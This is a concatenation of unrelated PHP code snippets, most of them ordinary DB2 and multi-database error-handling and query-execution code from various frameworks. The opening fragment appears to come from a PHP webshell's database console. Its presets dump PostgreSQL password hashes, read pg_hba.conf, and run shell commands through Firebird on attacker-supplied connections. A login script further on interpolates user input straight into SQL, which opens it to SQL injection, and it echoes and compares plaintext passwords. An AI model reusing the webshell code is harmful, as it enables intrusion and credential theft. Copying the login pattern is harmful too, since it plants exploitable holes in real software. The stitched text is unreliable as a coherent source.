: '******'; $db2pass = isset($_POST['db2pass']) ? $_POST['db2pass'] : '******'; $db2dbname = isset($_POST['db2dbname']) ? $_POST['db2dbname'] : 'mysql'; $db2action = isset($_POST['action']) ? $_POST['action'] : ''; $db2query = isset($_POST['db2sql']) ? $_POST['db2sql'] : ''; $db2query = stripslashes($db2query); print <<<END <form method="POST" name="db2form" action="?s=w&db=db2"> <div class="actall">Host:<input type="text" name="db2host" value="{$db2host}" style="width:100px"> Port:<input type="text" name="db2port" value="{$db2port}" style="width:60px"> User:<input type="text" name="db2user" value="{$db2user}" style="width:100px"> Pass:<input type="text" name="db2pass" value="{$db2pass}" style="width:100px"> Dbname:<input type="text" name="db2dbname" value="{$db2dbname}" style="width:100px"><br><br> <script language="javascript"> function db2Full(i){ \tStr = new Array(4); Str[0] = ""; \tStr[1] = "select schemaname from syscat.schemata;"; Str[2] = "select name from sysibm.systables;"; Str[3] = "select colname from syscat.columns where tabname='table_name';"; Str[4] = "db2 get db cfg for db_name;"; \tdb2form.db2sql.value = Str[i]; \treturn true; } </script> <textarea name="db2sql" style="width:600px;height:200px;">{$db2query}</textarea><br> <select onchange="return db2Full(options[selectedIndex].value)"> \t<option value="0" selected>command</option> <option value="1">databases</option> <option value="1">tables</option> <option value="2">columns</option> <option value="3">db config</option> </select> <input type="hidden" name="action" value="db2query"> <input class="bt" type="submit" value="Query"></div></form> END; if ($myaction == 'db2query') { //$db2string = "DRIVER={IBM DB2 ODBC DRIVER};DATABASE=$db2dbname;"."HOSTNAME=$db2host;PORT=$db2port;PROTOCOL=TCPIP;UID=$db2user;PWD=$db2pass;"; $db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg()); $db2result = db2_exec($db2link, $db2query) or die(db2_stmt_errormsg()); $db2row = db2_fetch_row($db2result); echo '<font face="verdana">'; echo '<table border="1" cellpadding="1" cellspacing="2">'; echo "\n<tr>\n"; for ($i = 0; $i < db2_num_fields($db2result); $i++) { echo '<td bgcolor="#228B22"><b>' . db2_field_name($db2result); echo "</b></td>\n"; } echo "</tr>\n"; while ($db2row = db2_fetch_row($db2result)) { echo "<tr>\n"; for ($i = 0; $i < db2_num_fields($db2result); $i++) { echo '<td bgcolor="#B8B8E8">'; echo "{$db2row[$i]}"; echo '</td>'; } echo "</tr>\n"; } echo "</table>\n"; echo "</font>"; db2_free_result($db2result); db2_close(); } } elseif ($db == "fb") { $fbhost = isset($_POST['fbhost']) ? $_POST['fbhost'] : 'localhost'; $fbpath = isset($_POST['fbpath']) ? $_POST['fbpath'] : ''; $fbpath = str_replace("\\\\", "\\", $fbpath); $fbuser = isset($_POST['fbuser']) ? $_POST['fbuser'] : '******'; $fbpass = isset($_POST['fbpass']) ? $_POST['fbpass'] : '******'; $fbaction = isset($_POST['action']) ? $_POST['action'] : ''; $fbquery = isset($_POST['fbsql']) ? $_POST['fbsql'] : ''; $fbquery = stripslashes($fbquery); print <<<END <form method="POST" name="fbform" action="?s=w&db=fb"> <div class="actall">Host:<input type="text" name="fbhost" value="{$fbhost}" style="width:100px"> Path:<input type="text" name="fbpath" value="{$fbpath}" style="width:100px"> User:<input type="text" name="fbuser" value="{$fbuser}" style="width:100px"> Pass:<input type="text" name="fbpass" value="{$fbpass}" style="width:100px"><br/> <script language="javascript"> function fbFull(i){ \tStr = new Array(5); Str[0] = ""; \tStr[1] = "select RDB\$RELATION_NAME from RDB\$RELATIONS;"; Str[2] = "select RDB\$FIELD_NAME from RDB\$RELATION_FIELDS where RDB\$RELATION_NAME='table_name';"; Str[3] = "input 'D:\\createtable.sql';"; Str[4] = "shell netstat -an;"; \tfbform.fbsql.value = Str[i]; \treturn true; } </script> <textarea name="fbsql" style="width:600px;height:200px;">{$fbquery}</textarea><br> <select onchange="return fbFull(options[selectedIndex].value)"> \t<option value="0" selected>command</option> <option value="1">tables</option> <option value="2">columns</option> <option value="3">import sql</option> <option value="4">shell</option> </select> <input type="hidden" name="action" value="fbquery"> <input class="bt" type="submit" value="Query"></div></form> END; if ($fbaction == 'fbquery') { $fblink = ibase_connect($fbhost . ':' . $fbpath, $fbuser, $fbpass) or die(ibase_errmsg()); $fbresult = ibase_query($fblink, $fbquery) or die(ibase_errmsg()); echo '<font face="verdana">'; echo '<table border="1" cellpadding="1" cellspacing="2">'; echo "\n<tr>\n"; for ($i = 0; $i < ibase_num_fields($fbresult); $i++) { echo '<td bgcolor="#228B22"><b>' . ibase_field_info($fbresult, $i); echo "</b></td>\n"; } echo "</tr>\n"; ibase_field_info($fbresult, 0); while ($fbrow = ibase_fetch_row($fbresult)) { echo "<tr>\n"; for ($i = 0; $i < ibase_num_fields($fbresult); $i++) { echo '<td bgcolor="#B8B8E8">'; echo "{$fbrow[$i]}"; echo '</td>'; } echo "</tr>\n"; } echo "</table>\n"; echo "</font>"; ibase_free_result($fbresult); ibase_close(); } } else { $pghost = isset($_POST['pghost']) ? $_POST['pghost'] : 'localhost'; $pguser = isset($_POST['pguser']) ? $_POST['pguser'] : '******'; $pgpass = isset($_POST['pgpass']) ? $_POST['pgpass'] : ''; $pgdbname = isset($_POST['pgdbname']) ? $_POST['pgdbname'] : 'postgres'; $pgaction = isset($_POST['action']) ? $_POST['action'] : ''; $pgquery = isset($_POST['pgsql']) ? $_POST['pgsql'] : ''; $pgquery = stripslashes($pgquery); print <<<END <form method="POST" name="pgform" action="?s=w"> <div class="actall">Host:<input type="text" name="pghost" value="{$pghost}" style="width:100px;"> User:<input type="text" name="pguser" vaule="{$pguser}" style="width:100px"> Pass:<input tyoe="text" name="pgpass" value="{$pgpass}" style="width:100px"> Dbname:<input type="text" name="pgdbname" value="{$pgdbname}" style="width:100px"><br><br> <script language="javascript"> function pgFull(i){ \tStr = new Array(7); \tStr[0] = ""; Str[1] = "select version();"; Str[2] = "select datname from pg_database;"; Str[3] = "select relname from pg_stat_user_tables limit 1 offset n;"; Str[4] = "select column_name from information_schema.columns where table_name='xxx' limit 1 offset n;"; Str[5] = "select usename,passwd from pg_shadow;"; \tStr[6] = "select pg_file_read('pg_hba.conf',1,pg_file_length('pg_hb.conf'));"; \tpgform.pgsql.value = Str[i]; \treturn true; } </script> <textarea name="pgsql" style="width:600px;height:200px;">{$pgquery}</textarea><br> <select onchange="return pgFull(options[selectedIndex].value)"> \t<option value="0" selected>command</option> <option value="1">version</option> <option value="2">databases</option> <option value="3">tables</option> <option value="4">columns</option> <option value="5">hashes</option> \t<option value="6">pg_hb.conf</option> </select> <input type="hidden" name="action" value="pgquery"> <input class="bt" type="submit" value="Query"></div></form> END; if ($pgaction == 'pgquery') { $pgconn = pg_connect("host={$pghost} dbname={$pgdbname} user={$pguser} password={$pgpass} ") or die('Could not connect: ' . pg_last_error()); $pgresult = pg_query($pgquery) or die('Query failed: ' . pg_last_error()); $pgrow = pg_fetch_row($pgresult); echo '<font face="verdana">'; echo '<table border="1" cellpadding="1" cellspacing="2">'; echo "\n<tr>\n"; for ($i = 0; $i < pg_num_fields($pgresult); $i++) { echo '<td bgcolor="#228B22"><b>' . pg_field_name($pgresult, $i); echo "</b></td>\n"; } echo "</tr>\n"; pg_result_seek($pgresult, 0); while ($pgrow = pg_fetch_row($pgresult)) { echo "<tr>\n"; for ($i = 0; $i < pg_num_fields($pgresult); $i++) { echo '<td bgcolor="#B8B8E8">'; echo "{$pgrow[$i]}"; echo '</td>'; } echo "</tr>\n"; } echo "</table>\n"; echo "</font>"; pg_free_result($pgresult); pg_close(); } } }
private function check_and_print_stmt_error($stmt = false) { $skip_errnos = array('02000'); if ($stmt) { if ($error = db2_stmt_errormsg($stmt)) { $errno = db2_stmt_error($stmt); if (in_array($errno, $skip_errnos)) { return false; } $this->print_error($error, $errno); return true; } return false; } else { if ($error = db2_stmt_errormsg()) { $errno = db2_stmt_error(); if (in_array($errno, $skip_errnos)) { return false; } $this->print_error($error, $errno); return true; } } return false; }
<?php session_unset(); error_reporting(0); session_start(); include 'connect.php'; if (isset($_POST['userName']) && isset($_POST['password'])) { $usernameEntered = $_POST['userName']; $passwordEntered = $_POST['password']; $conn = db2_connect($database, $dbusername, $dbpassword); $sqlquery = "SELECT password FROM OWNER.USERS WHERE email = '{$usernameEntered}' "; $stmt = db2_prepare($conn, $sqlquery); if ($stmt) { $result = db2_execute($stmt); if (!$result) { db2_stmt_errormsg($stmt); } while ($row = db2_fetch_array($stmt)) { $passwordFromDb = $row[0]; } db2_close($conn); echo $passwordFromDb; if ($passwordEntered == $passwordFromDb) { $_SESSION['username'] = $usernameEntered; header('Location: nav.php'); } else { header('Location: login.php'); } } } else { http_response_code(400);
/** * Execute * * @param null $parameters * @return Result */ public function execute($parameters = null) { if (!$this->isPrepared) { $this->prepare(); } /** START Standard ParameterContainer Merging Block */ if (!$this->parameterContainer instanceof ParameterContainer) { if ($parameters instanceof ParameterContainer) { $this->parameterContainer = $parameters; $parameters = null; } else { $this->parameterContainer = new ParameterContainer(); } } if (is_array($parameters)) { $this->parameterContainer->setFromArray($parameters); } /** END Standard ParameterContainer Merging Block */ if ($this->profiler) { $this->profiler->profilerStart($this); } set_error_handler(function () { }, E_WARNING); // suppress warnings $response = db2_execute($this->resource, $this->parameterContainer->getPositionalArray()); restore_error_handler(); if ($this->profiler) { $this->profiler->profilerFinish(); } if ($response === false) { throw new Exception\RuntimeException(db2_stmt_errormsg($this->resource)); } $result = $this->driver->createResult($this->resource); return $result; }
/** * (non-PHPdoc) * @see DBManager::lastDbError() */ public function lastDbError() { if (db2_conn_error()) { return "IBM_DB2 connection error " . db2_conn_error() . ": " . db2_conn_errormsg(); } /* FIXME: * Added $connOnly parameter to skip the statement error check * as there is a statics bug in the DB2 driver which persists failures * */ if (!$this->ignoreErrors) { $error = db2_stmt_error(); if ($error) { return "IBM_DB2 statement error " . $error . ": " . db2_stmt_errormsg(); } } return false; }
/** * Returns a formatted error message from previous database operation. * DB2 distinguishes between statement and connnection errors so we * must check for both. * * @return string Error message with error number */ function lastError() { if (db2_stmt_error()) { return db2_stmt_error() . ': ' . db2_stmt_errormsg(); } elseif (db2_conn_error()) { return db2_conn_error() . ': ' . db2_conn_errormsg(); } return null; }
/** * Execute * * @param string $sql * @return Result */ public function execute($sql) { if (!$this->isConnected()) { $this->connect(); } if ($this->profiler) { $this->profiler->profilerStart($sql); } set_error_handler(function () { }, E_WARNING); // suppress warnings $resultResource = db2_exec($this->resource, $sql); restore_error_handler(); if ($this->profiler) { $this->profiler->profilerFinish($sql); } // if the returnValue is something other than a pg result resource, bypass wrapping it if ($resultResource === false) { throw new Exception\InvalidQueryException(db2_stmt_errormsg()); } $resultPrototype = $this->driver->createResult($resultResource === true ? $this->resource : $resultResource); return $resultPrototype; }
function DBexecute($query, $skip_error_messages = 0) { global $DB; if (!isset($DB['DB']) || empty($DB['DB'])) { return false; } $result = false; $time_start = microtime(true); $DB['EXECUTE_COUNT']++; switch ($DB['TYPE']) { case ZBX_DB_MYSQL: if (!($result = mysqli_query($DB['DB'], $query))) { error('Error in query [' . $query . '] [' . mysqli_error($DB['DB']) . ']'); } break; case ZBX_DB_POSTGRESQL: if (!($result = (bool) pg_query($DB['DB'], $query))) { error('Error in query [' . $query . '] [' . pg_last_error() . ']'); } break; case ZBX_DB_ORACLE: if (!($result = oci_parse($DB['DB'], $query))) { $e = @oci_error(); error('SQL error [' . $e['message'] . '] in [' . $e['sqltext'] . ']'); } elseif (!@oci_execute($result, $DB['TRANSACTIONS'] ? OCI_DEFAULT : OCI_COMMIT_ON_SUCCESS)) { $e = oci_error($result); error('SQL error [' . $e['message'] . '] in [' . $e['sqltext'] . ']'); } else { $result = true; // function must return boolean } break; case ZBX_DB_DB2: if (!($result = db2_prepare($DB['DB'], $query))) { $e = @db2_stmt_errormsg($result); error('SQL error [' . $query . '] in [' . $e . ']'); } elseif (true !== @db2_execute($result)) { $e = @db2_stmt_errormsg($result); error('SQL error [' . $query . '] in [' . $e . ']'); } else { $result = true; // function must return boolean } break; case ZBX_DB_SQLITE3: if ($DB['TRANSACTIONS'] == 0) { lock_sqlite3_access(); } if (!($result = $DB['DB']->exec($query))) { error('Error in query [' . $query . '] Error code [' . $DB['DB']->lastErrorCode() . '] Message [' . $DB['DB']->lastErrorMsg() . ']'); } if ($DB['TRANSACTIONS'] == 0) { unlock_sqlite3_access(); } break; } if ($DB['TRANSACTIONS'] != 0 && !$result) { $DB['TRANSACTION_NO_FAILED_SQLS'] = false; } CProfiler::getInstance()->profileSql(microtime(true) - $time_start, $query); return (bool) $result; }
protected function _rawQuery($sql) { $conn = $this->_db->getConnection(); $result = @db2_exec($conn, $sql); if (!$result) { $e = db2_stmt_errormsg(); require_once 'Zend/Db/Exception.php'; throw new Zend_Db_Exception("SQL error for \"{$sql}\": {$e}"); } }
/** * This function processes an SQL statement that will NOT return data. * * @access public * @override * @param string $sql the SQL statement * @throws Throwable_SQL_Exception indicates that the executed * statement failed * * @see * @see */ public function execute($sql) { if (!$this->is_connected()) { throw new Throwable_SQL_Exception('Message: Failed to execute SQL statement. Reason: Unable to find connection.'); } $command = @db2_exec($this->resource, $sql); if ($command === FALSE) { throw new Throwable_SQL_Exception('Message: Failed to execute SQL statement. Reason: :reason', array(':reason' => @db2_stmt_errormsg($command))); } $this->sql = $sql; @db2_free_result($command); }
public function doQuery($sql) { //print "<li><pre>$sql</pre></li>"; // Switch into the correct namespace $this->applySchema(); $ret = db2_exec($this->mConn, $sql, $this->mStmtOptions); if (!$ret) { print "<br><pre>"; print $sql; print "</pre><br>"; $error = db2_stmt_errormsg(); throw new DBUnexpectedError($this, 'SQL error: ' . htmlspecialchars($error)); } $this->mLastResult = $ret; $this->mAffectedRows = null; // Not calculated until asked for return $ret; }
/** * {@inheritdoc} */ public function execute($params = null) { if (!$this->_stmt) { return false; } /*$retval = true; if ($params !== null) { $retval = @db2_execute($this->_stmt, $params); } else { $retval = @db2_execute($this->_stmt); }*/ if ($params === null) { ksort($this->_bindParam); $params = array_values($this->_bindParam); } $retval = @db2_execute($this->_stmt, $params); if ($retval === false) { throw new DB2Exception(db2_stmt_errormsg()); } return $retval; }
/** * Gets a property value in the fetched row given a SQL statement. * * @param unknown $sql * the sql statement. * @throws Exception * @return the property value. */ public function fetchObjectProperty($sql, $property) { $propertyValue = null; $connection = $this->connect(); $stmt = db2_prepare($connection, $sql); $result = db2_execute($stmt, array(0)); if ($result) { while (db2_fetch_row($stmt)) { $propertyValue = db2_result($stmt, $property); } } else { $message = "\nCould not fetch the object from database table. " . db2_stmt_errormsg($stmt); throw new Exception($message); } $this->__destruct(); return $propertyValue; }
/** * Gets the latest database error message. * * @return string The text of the last database error. (The type of * information varies depending on the which type of database * is being used.) */ function dbi_error() { if (strcmp($GLOBALS["db_type"], "mysql") == 0) { $ret = mysql_error(); } else { if (strcmp($GLOBALS["db_type"], "mysqli") == 0) { $ret = mysqli_error($GLOBALS["db_connection"]); } else { if (strcmp($GLOBALS["db_type"], "mssql") == 0) { // no real mssql_error function. this is as good as it gets $ret = mssql_get_last_message(); } else { if (strcmp($GLOBALS["db_type"], "oracle") == 0) { $ret = OCIError($GLOBALS["oracle_connection"]); } else { if (strcmp($GLOBALS["db_type"], "postgresql") == 0) { $ret = pg_errormessage($GLOBALS["postgresql_connection"]); } else { if (strcmp($GLOBALS["db_type"], "odbc") == 0) { // no way to get error from ODBC API $ret = "Unknown ODBC error"; } else { if (strcmp($GLOBALS["db_type"], "ibm_db2") == 0) { $ret = db2_conn_errormsg(); if ($ret == '') { $ret = db2_stmt_errormsg(); } } else { if (strcmp($GLOBALS["db_type"], "ibase") == 0) { $ret = ibase_errmsg(); } else { $ret = "dbi_error(): db_type not defined."; } } } } } } } } if (strlen($ret)) { return $ret; } else { return "Unknown error"; } }
/** * Prepare a statement handle. * * @param string $sql * @return void * @throws Zend_Db_Statement_Db2_Exception */ public function _prepSql($sql) { Zend_Db_Statement::_prepSql($sql); $connection = $this->_connection->getConnection(); $this->_stmt = db2_prepare($connection, $sql); if (!$this->_stmt) { require_once 'Zend/Db/Statement/Db2/Exception.php'; throw new Zend_Db_Statement_Db2_Exception(db2_stmt_errormsg($this->_stmt), db2_stmt_error($this->_stmt)); } }
/** * Checks to see if an SQL error occured * * @param fResult|fUnbufferedResult|boolean $result The result object for the query * @param mixed $extra_info The sqlite extension will pass a string error message, the oci8 extension will pass the statement resource * @param string $sql The SQL that was executed * @return void */ private function checkForError($result, $extra_info = NULL, $sql = NULL) { if ($result === FALSE || $result->getResult() === FALSE) { if ($this->extension == 'ibm_db2') { if (is_resource($extra_info)) { $message = db2_stmt_errormsg($extra_info); } else { $message = db2_stmt_errormsg(); } } elseif ($this->extension == 'mssql') { $message = $this->error; unset($this->error); } elseif ($this->extension == 'mysql') { $message = mysql_error($this->connection); } elseif ($this->extension == 'mysqli') { if (is_object($extra_info)) { $message = $extra_info->error; } else { $message = mysqli_error($this->connection); } } elseif ($this->extension == 'oci8') { $error_info = oci_error($extra_info); $message = $error_info['message']; } elseif ($this->extension == 'pgsql') { $message = pg_last_error($this->connection); } elseif ($this->extension == 'sqlite') { $message = $extra_info; } elseif ($this->extension == 'sqlsrv') { $error_info = sqlsrv_errors(SQLSRV_ERR_ALL); $message = $error_info[0]['message']; } elseif ($this->extension == 'pdo') { if ($extra_info instanceof PDOStatement) { $error_info = $extra_info->errorInfo(); } else { $error_info = $this->connection->errorInfo(); } if (empty($error_info[2])) { $error_info[2] = 'Unknown error - this usually indicates a bug in the PDO driver'; } $message = $error_info[2]; } $db_type_map = array('db2' => 'DB2', 'mssql' => 'MSSQL', 'mysql' => 'MySQL', 'oracle' => 'Oracle', 'postgresql' => 'PostgreSQL', 'sqlite' => 'SQLite'); throw new fSQLException('%1$s error (%2$s) in %3$s', $db_type_map[$this->type], $message, is_object($result) ? $result->getSQL() : $sql); } }
/** * Execute a prepared query with the various arguments * @param $prepared String: the prepared sql * @param $args Mixed: either an array here, or put scalars as varargs * @return Resource: results object */ public function execute($prepared, $args = null) { if (!is_array($args)) { # Pull the var args $args = func_get_args(); array_shift($args); } $res = db2_execute($prepared, $args); if (!$res) { $this->installPrint(db2_stmt_errormsg()); } return $res; }